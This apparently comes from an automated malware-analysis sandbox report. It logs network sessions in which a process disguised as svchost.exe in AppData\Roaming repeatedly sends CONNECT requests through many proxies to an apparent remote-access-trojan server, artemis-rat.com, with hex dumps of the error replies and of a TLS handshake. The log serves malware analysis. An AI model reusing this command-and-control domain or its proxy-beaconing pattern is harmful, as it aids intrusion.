                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2064192.168.2.556743202.159.35.18944343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.685535908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2065192.168.2.556746202.159.35.18944343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.687402964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2066192.168.2.556378134.209.29.120312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.695059061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.790123940 CET28INHTTP/1.1 400 Bad Request


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2067192.168.2.556555162.159.246.1358043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.695060015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.855988026 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2068192.168.2.556323171.250.222.13108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.699934959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.442709923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.646145105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2069192.168.2.556352196.20.125.149808343220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.703663111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2070192.168.2.55634952.67.10.1838043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.703911066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.033840895 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0
                                                                                    Mar 9, 2024 13:14:29.046055079 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 a3 e1 88 0f a4 48 ef 76 a0 16 88 07 71 11 63 e9 54 5d ed c3 98 64 3f e4 47 82 de 68 76 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: eRHvqcT]d?Ghv*,+0/$#('=<5/Uartemis-rat.com#
                                                                                    Mar 9, 2024 13:14:29.372229099 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 51 42 da 1b 42 75 00 4f 74 d1 3d 34 f3 10 32 b4 15 1c 8f 6a c0 90 ef d3 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                    Data Ascii: =9QBBuOt=42jDOWNGRD0000*H010Uartemis-rat.com0240309121340Z260309121340Z010Uartemis-rat.com0"0*H0Z~fVz'
                                                                                    Mar 9, 2024 13:14:29.396013975 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 8d 1c e7 a7 0c a3 62 a9 c3 cd 4d c4 5f d4 32 3a 76 0d 4b 7b 75 ce 4b 75 d6 59 35 38 ce d6 74 04 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 04 ba 0e fa 2f bf b6 c1 28 c7 fd f9 23 53 23 ec c0 eb 65 52 22
                                                                                    Data Ascii: %! bM_2:vK{uKuY58t(/(#S#eR"O!A@
                                                                                    Mar 9, 2024 13:14:29.724057913 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 5b 94 3c 99 0f 68 1b 38 c4 f4 93 ca af 26 68 6c 81 e2 d6 bf d3 1d b8 ab 0d e4 37 4d 42 b0 40 6b a1 2d 40 c4 a0 59 46 2e
                                                                                    Data Ascii: ([<h8&hl7MB@k-@YF.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2071192.168.2.55540345.128.133.1108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.712224007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2072192.168.2.556567172.64.80.558043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.718097925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.872653961 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2073192.168.2.556485184.170.248.5414543220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.719377995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2074192.168.2.556571104.20.67.1138043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.720464945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.874823093 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2075192.168.2.55651738.162.15.98312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.720684052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.150094032 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm=""
                                                                                    Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                    Data Ascii: Proxy Authentication Required


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2076192.168.2.556586104.21.223.1818043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.720885992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.874937057 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2077192.168.2.556581104.19.79.2388043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.720912933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.874986887 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2078192.168.2.55644843.163.192.31567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.739362955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2079192.168.2.556605104.23.125.1178043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.740045071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.894550085 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2080192.168.2.556593162.159.241.58043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.740107059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.901608944 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2081192.168.2.555822142.54.239.1414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.740334034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2082192.168.2.555462107.180.103.2146163443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.741110086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.880338907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.880873919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2083192.168.2.556360154.85.125.235644643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.741112947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.114983082 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                    Proxy-Connection: close
                                                                                    X-Webshare-Error: 407
                                                                                    X-Webshare-Reason: invalidpassword
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Length: 121
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                    Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2084192.168.2.556387125.94.219.96909143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.748940945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.105252981 CET325INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.12.1
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 173
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2085192.168.2.556635185.162.228.1548043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.753206968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.907618046 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
